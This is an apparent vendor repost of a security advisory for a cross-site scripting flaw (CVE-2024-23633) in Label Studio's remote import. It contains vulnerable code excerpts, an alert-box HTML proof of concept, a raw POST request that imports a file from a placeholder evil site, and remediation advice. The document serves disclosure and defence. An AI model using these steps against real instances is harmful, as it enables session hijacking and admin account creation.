Cross-site Scripting Vulnerability on Data Import
GHSA-fq23-g58m-799r · CVE-2024-23633 · PYSEC-2024-128
Published · Modified
Description
Introduction
This write-up describes a vulnerability found in Label Studio, a popular open source data labeling tool. The vulnerability affects all versions of Label Studio prior to 1.10.1 and was tested on version 1.9.2.post0.
Overview
Label Studio had a remote import feature allowed users to import data from a remote web source, that was downloaded and could be viewed on the website. This feature could had been abused to download a HTML file that executed malicious JavaScript code in the context of the Label Studio website.
Description
The following code snippet in Label Studio showed that is a URL passed the SSRF verification checks, the contents of the file would be downloaded using the filename in the URL.
def tasks_from_url(file_upload_ids, project, user, url, could_be_tasks_list):
"""Download file using URL and read tasks from it"""
# process URL with tasks
try:
filename = url.rsplit('/', 1)[-1] <1>
response = ssrf_safe_get(
url, verify=project.organization.should_verify_ssl_certs(), stream=True, headers={'Accept-Encoding': None}
)
file_content = response.content
check_tasks_max_file_size(int(response.headers['content-length']))
file_upload = create_file_upload(user, project, SimpleUploadedFile(filename, file_content))
if file_upload.format_could_be_tasks_list:
could_be_tasks_list = True
file_upload_ids.append(file_upload.id)
tasks, found_formats, data_keys = FileUpload.load_tasks_from_uploaded_files(project, file_upload_ids)
except ValidationError as e:
raise e
except Exception as e:
raise ValidationError(str(e))
return data_keys, found_formats, tasks, file_upload_ids, could_be_tasks_list
- The file name that was set was retrieved from the URL.
The downloaded file path could then be retrieved by sending a request to /api/projects/{project_id}/file-uploads?ids=[{download_id}] where {project_id} was the ID of the project and {download_id} was the ID of the downloaded file. Once the downloaded file path was retrieved by the previous API endpoint, the following code snippet demonstrated that the Content-Type of the response was determined by the file extension, since mimetypes.guess_type guesses the Content-Type based on the file extension.
class UploadedFileResponse(generics.RetrieveAPIView):
permission_classes = (IsAuthenticated,)
@swagger_auto_schema(auto_schema=None)
def get(self, *args, **kwargs):
request = self.request
filename = kwargs['filename']
# XXX needed, on windows os.path.join generates '\' which breaks FileUpload
file = settings.UPLOAD_DIR + ('/' if not settings.UPLOAD_DIR.endswith('/') else '') + filename
logger.debug(f'Fetch uploaded file by user {request.user} => {file}')
file_upload = FileUpload.objects.filter(file=file).last()
if not file_upload.has_permission(request.user):
return Response(status=status.HTTP_403_FORBIDDEN)
file = file_upload.file
if file.storage.exists(file.name):
content_type, encoding = mimetypes.guess_type(str(file.name)) <1>
content_type = content_type or 'application/octet-stream'
return RangedFileResponse(request, file.open(mode='rb'), content_type=content_type)
else:
return Response(status=status.HTTP_404_NOT_FOUND)
- Determines the
Content-Typebased on the extension of the uploaded file by usingmimetypes.guess_type.
Since the Content-Type was determined by the file extension of the downloaded file, an attacker could import in a .html file that would execute JavaScript when visited.
Proof of Concept
Below were the steps to recreate this issue:
- Host the following HTML proof of concept (POC) script on an external website with the file extension
.htmlthat would be downloaded to the Label Studio website.
<html>
<body>
<h1>Data Import XSS</h1>
<script>
alert(document.domain);
</script>
</body>
</html>
- Send the following
POSTrequest to download the HTML POC to the Label Studio and note the returned ID of the downloaded file in the response. In the following POC the{victim_host}is the address and port of the victim Label Studio website (eg.labelstudio.com:8080),{project_id}is the ID of the project where the data would be imported into,{cookies}are session cookies and{evil_site}is the website hosting the malicious HTML file (namedxss.htmlin the following example).
POST /api/projects/{project_id}/import?commit_to_project=false HTTP/1.1
Host: {victim_host}
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
content-type: application/x-www-form-urlencoded
Content-Length: 43
Connection: close
Cookie: {cookies}
Pragma: no-cache
Cache-Control: no-cache
url=https://{evil_site}/xss.html
To retrieve the downloaded file path could be retrieved by sending a
GETrequest to/api/projects/{project_id}/file-uploads?ids=[{download_id}], where{download_id}is the ID of the file download from the previous step.Send your victim a link to
/data/{file_path}, where{file_path}is the path of the downloaded file from the previous step. The following screenshot demonstrated executing the POC JavaScript code by visiting/data/upload/1/cfcfc340-xss.html.

Impact
Executing arbitrary JavaScript could result in an attacker performing malicious actions on Label Studio users if they visit the crafted avatar image. For an example, an attacker can craft a JavaScript payload that adds a new Django Super Administrator user if a Django administrator visits the image.
Remediation Advice
- For all user provided files that are downloaded by Label Studio, set the
Content-Security-Policy: sandbox;response header when viewed on the site. Thesandboxdirective restricts a page's actions to prevent popups, execution of plugins and scripts and enforces asame-originpolicy (documentation). - Restrict the allowed file extensions that could be downloaded.
Discovered
- August 2023, Alex Brown, elttam
References
- WEB https://github.com/HumanSignal/label-studio/security/advisories/GHSA-fq23-g58m-799r
- ADVISORY https://nvd.nist.gov/vuln/detail/CVE-2024-23633
- WEB https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/sandbox
- PACKAGE https://github.com/HumanSignal/label-studio
- WEB https://github.com/HumanSignal/label-studio/blob/1.9.2.post0/label_studio/data_import/api.py#L595C1-L616C62
- WEB https://github.com/HumanSignal/label-studio/blob/1.9.2.post0/label_studio/data_import/uploader.py#L125C5-L146
- WEB https://github.com/pypa/advisory-database/tree/main/vulns/label-studio/PYSEC-2024-128.yaml
Ready to move
Start Securing
Free, no credit card | First findings in minutes